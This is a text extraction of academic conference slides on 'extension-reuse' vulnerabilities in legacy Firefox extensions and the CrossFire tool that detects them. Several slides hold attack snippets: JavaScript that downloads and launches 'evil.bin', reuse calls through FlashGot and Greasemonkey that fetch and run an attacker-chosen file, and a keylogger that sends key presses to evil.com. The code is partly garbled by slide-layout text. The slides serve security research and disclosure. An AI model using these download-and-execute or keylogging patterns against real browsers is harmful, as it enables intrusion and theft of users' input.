Automated Detection of Firefox Extension-

Size: px

Start display at page:

Download "Automated Detection of Firefox Extension-"

Harry Thompson
5 years ago
Views:

1 Automated Detection of Firefox Extension- Click to edit Master text Reuse stylesvulnerabilities Ahmet S BUYUKKAYHAN William ROBERTSON

2 Co-directs Third the level NEU Systems Security Lab with Engin Kirda Who are we? Assistant professor of computer science at Northeastern University Second in Boston, level MA Systems, network, and software security researcher Past winner of DEFCON CTF with Shellphish (a long, long time ago ) 2

3 Member of the NEU Systems Security Lab Who are we? PhD Candidate at Northeastern University Authored peer-reviewed conference and journal papers in top-tier security venues 3

4 Singapore 4

5 Boston 5

6 Background Extension-Reuse Attacks CrossFire» & Fifth Demo level Evaluation Conclusion Agenda 6

7 Background

8 Add new capabilities, customization to browsers ~15K extensions in Mozilla Add-ons repository Browser Extensions Popular ones have millions of users Mostly written in JavaScript 8

9 Shared window Legacy Firefox Extensions Shared JavaScript namespace Extensions can read/write objects or variables of others Can invoke functionality of others Read/write GUI elements Listen to all events No privilege separation XUL XUL XUL JavaScript XPCOM Full access to filesystem, network File System Network 9

Threat Model The browser is an attractive target Extension Second authors level are untrusted Vulnerable Third extensions level can be exploited Benign-but-buggy threat model Malicious extensions are

10 Threat Model The browser is an attractive target Extension Second authors level are untrusted Vulnerable Third extensions level can be exploited Benign-but-buggy threat model Malicious extensions are a real threat Trick users» into Fifth installing level malicious extensions Powerful ( man-in-the-browser attacks) Easy to develop, difficult to detect 161 malicious extensions are blocked by Mozilla Feb

11 Existing Methods for Protection Enforcing browser marketplaces Second for level extensions Automated Third analysis level Human reviews Fourth level Extension signing Vetting Extension isolation Least privilege and policy-based enforcement 11

12 Add-on SDK (a.k.a., Jetpack) Introduced in 2009 Isolates Third extensions level from each other Separate content and core scripts Implements» principle Fifth level of least privilege But, adoption has been slow Superseded by WebExtensions October % of the top 2,000 March % of the top 2,000 Release Date of WebExtensions in Q

13 Extension-Reuse Attacks

14 Evil Extension (No Sensitive Calls) No Suspicious Behavior Attack Model Evil Extension Extension X Extension Y Sensitive Calls Sensitive Calls Vetting Sandbox Victim`s Browser 14

15 Lack of isolation leaves legacy extensions Second defenseless level against capability Third leaks level Attackers can Fourth stitch level together exploits by abusing capabilities Impact The more power vulnerable extensions have, the easier it is for an evil extension 15

16 Download & Execute Evil Binary const WebBrowserPersist = Components.Constructor( "@mozilla.org/embedding/browser/nswebbrowserpersist;1", Second level "nsiwebbrowserpersist"); var persist = Third WebBrowserPersist(); level var targetfile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); targetfile.initwithpath( evil.bin"); persist.saveuri( null, null, null, "", targetfile, null); targetfile.launch(); 16

17 Download Extension X Extension-reuse Attack Example Extension Execute Extension Y var files = [{ href: $url, description: "", fname: $path, noredir: true }]; gflashgotservice.download(files); Exe Internet File System var gprefman = new GM_PrefManager(); gprefman.setvalue( editor, $path); GM_util.openInEditor(); 17

18 To Reuse or Not To Reuse const WebBrowserPersist = Components.Constructor("@mozilla.org /embedding/browser/nswebbrowserpersi st;1", "nsiwebbrowserpersist"); var persist = Third WebBrowserPersist(); level var targetfile = Fourth level Components.classes["@mozilla.org/fil e/local;1"].createinstance(component s.interfaces.nsilocalfile); targetfile.initwithpath($path); persist.saveuri($url, null, null, null, "", targetfile, null); targetfile.launch(); var files = [{ href: $url, description: "", fname: $path, noredir: true }]; gflashgotservice.download(files); var gprefman = new GM_PrefManager(); gprefman.setvalue( editor, $path); GM_util.openInEditor(); 18

php?key="; gd12.keydownhandler = function(e) { gd12.dicinline.

19 Another Example A key logger, which sends each key press to evil.com gd12.dicinline.urlwikprefix = " gd12.keydownhandler = function(e) { gd12.dicinline.lookupwikt(string.fromcharcode(e.which), false, false); }; gd12.init(); Internet Evil.com 19

20 CrossFire

21 CrossFire Overview 21

22 DEMO 22

23 Evaluation

extensions Manual analysis on all set Case Study Developed an

24 Top 2000 Third most level downloaded extensions Manual analysis Fourth level on random set of 323 Method Top 10 most downloaded extensions Manual analysis on all set Case Study Developed an extension with crossextension function call Applied to full review 24

25 Top 10 Firefox Extensions Extension Name Automated Exploits Manual Exploits False Positives # of Users Adblock Plus M Video DownloadHelper M Firebug M NoScript M DownThemAll! M Greasemonkey M Web of Trust M Flash Video Down M FlashGot Mass Down M Down. YouTube Videos M 25

26 Detected Vulnerabilities Random Set True Second Positives level Summary of Results 96 Fourth level 27% False Positives Positive Vulnerabilities by Attack Type Manual 51 20% Automated % % 26

27 Breakdown of Positive Vulnerabilities Category Event Listener Registration 12% Preference Access 3% Code Execution 3% Positive Vulnerabilities By Category File I/O 16% Network Access 66% Code Execution File I/O Network Access Preference Access Event Listener Reg. Description Execute binary or JS Read from/write to Filesystem Open a URI or download a file Read/write browser settings Key logging events only 27

28 Fast static analysis Performance ~ 1 sec average (per extension) Min Q1 Median Mean Q3 Max 0.05s 0.18s 0.28s 1.06s 0.51s s Fast exploit generation ~ 380 secs (~ 6 mins) on average (per exploit) Min Q1 Median Mean Q3 Max 30s 192s 270s 378.6s s 28

harmless link // Attacker chooses $url noscriptbm.

29 ValidateThisWebSite ~50 lines of code No obfuscation Third level or attempt to hide Opens unnecessary harmless link // Attacker chooses $url noscriptbm.placesutils. ns. global.ns. loaderrorpage(window[1], $url); Case Study 29

30 CrossFire Third does level not handle Inferring dynamic Fourth level types Prototype-based» Fifth inheritance level Limitations CrossFire is not a sound and precise analysis tool String evaluation 30

31 Isolation Mitigation & Detection Least privilege Secure Third functionality level and data sharing Check for extension-reuse vulnerabilities Mozilla security team is informed 31

32 Attackers can easily automate More robust isolation, vetting, and analysis required Key Takeaways Lack of isolation allows stealthy attacks 32

33 Thank You 33

The security of Mozilla Firefox s Extensions. Kristjan Krips

The security of Mozilla Firefox s Extensions Kristjan Krips Topics Introduction The extension model How could extensions be used for attacks - website defacement - phishing attacks - cross site scripting